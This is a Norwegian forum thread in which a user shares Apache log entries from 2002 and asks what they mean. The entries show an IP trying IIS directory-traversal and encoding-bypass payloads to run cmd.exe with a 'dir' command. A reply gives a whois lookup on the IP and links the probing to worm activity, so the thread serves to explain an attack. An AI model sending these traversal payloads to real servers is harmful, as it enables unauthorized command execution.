Apache logg...

[John Abrahamsen]

Fant det der i loggen på apache servern! Noen som kan tyde det? Ser ut som at en med IPen 80.11.157.114 prøver å kjøre CMD for meg :-?.

 

80.11.157.114 - - [23/Dec/2002:17:07:20 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

80.11.157.114 - - [23/Dec/2002:17:07:21 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

80.11.157.114 - - [23/Dec/2002:17:07:21 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331

80.11.157.114 - - [23/Dec/2002:17:07:31 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

80.11.157.114 - - [23/Dec/2002:17:07:31 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

80.11.157.114 - - [23/Dec/2002:17:07:32 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

80.11.157.114 - - [23/Dec/2002:17:07:32 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

80.11.157.114 - - [23/Dec/2002:17:07:33 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288

80.11.157.114 - - [23/Dec/2002:17:07:34 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288

80.11.157.114 - - [23/Dec/2002:17:07:34 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

80.11.157.114 - - [23/Dec/2002:17:07:35 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

[LOBOS2]

80.11.157.114 + DatoTid Er fra:

( Husk det er ikke sikkert det er "han" som er hackeren.... Det kan nemelig være slik at han har blit hacka først for å være et offer, har en worm på sitt sytem eller at han bare er dum. )

 

[Query: 80.11.157.114, Server: whois.ripe.net]

 

% This is the RIPE Whois server.

% The objects are in RPSL format.

%

% Rights restricted by copyright.

% See http://www.ripe.net/ripencc/pub-services/d.../copyright.html

 

inetnum: 80.11.157.0 - 80.11.157.255

netname: IP2000-ADSL-BAS

descr: BSBGN109 Boulogne Bloc2

country: FR

admin-c: WITR1-RIPE

tech-c: WITR1-RIPE

status: ASSIGNED PA

remarks: for hacking, spamming or security problems send mail to

remarks: [email protected] AND [email protected]

remarks: for ANY problem send mail to [email protected]

notify: [email protected]

mnt-by: FT-BRX

changed: [email protected] 20010913

source: RIPE

 

route: 80.11.128.0/18

descr: France Telecom

descr: Wanadoo Interactive

remarks: -------------------------------------------

remarks: For Hacking, Spamming or Security problems

remarks: send mail to [email protected] ONLY

remarks: -------------------------------------------

origin: AS3215

mnt-by: RAIN-TRANSPAC

mnt-by: FT-BRX

changed: [email protected] 20020226

source: RIPE

 

role: Wanadoo Interactive Technical Role

address: WANADOO INTERACTIVE

address: 48 rue Camille Desmoulins

address: 92791 ISSY LES MOULINEAUX CEDEX 9

address: FR

phone: +33 1 58 88 50 00

e-mail: [email protected]

e-mail: [email protected]

admin-c: FTI-RIPE

tech-c: TEFS1-RIPE

nic-hdl: WITR1-RIPE

notify: [email protected]

mnt-by: FT-BRX

changed: [email protected] 20010504

changed: [email protected] 20010912

changed: [email protected] 20011204

source: RIPE

 

 

 

[End of Data]

 

Og så kan du lese dette for å skjønne loggen bedre:

 

http://www.securityspace.com/smysecure/w32...2_nmda_amm.html

 

Mange av de forsøker å få en c:...osv...>dir commando til å ses i et brower vindue eller en telnet client som feks ehhhh Telnet hehe.

Der det er et exploit vunrebilety får Hackeren det samme i sin client som du ville få om du gikk til

Start_Porgrams_MsDosPrompt og skrev dir (enter).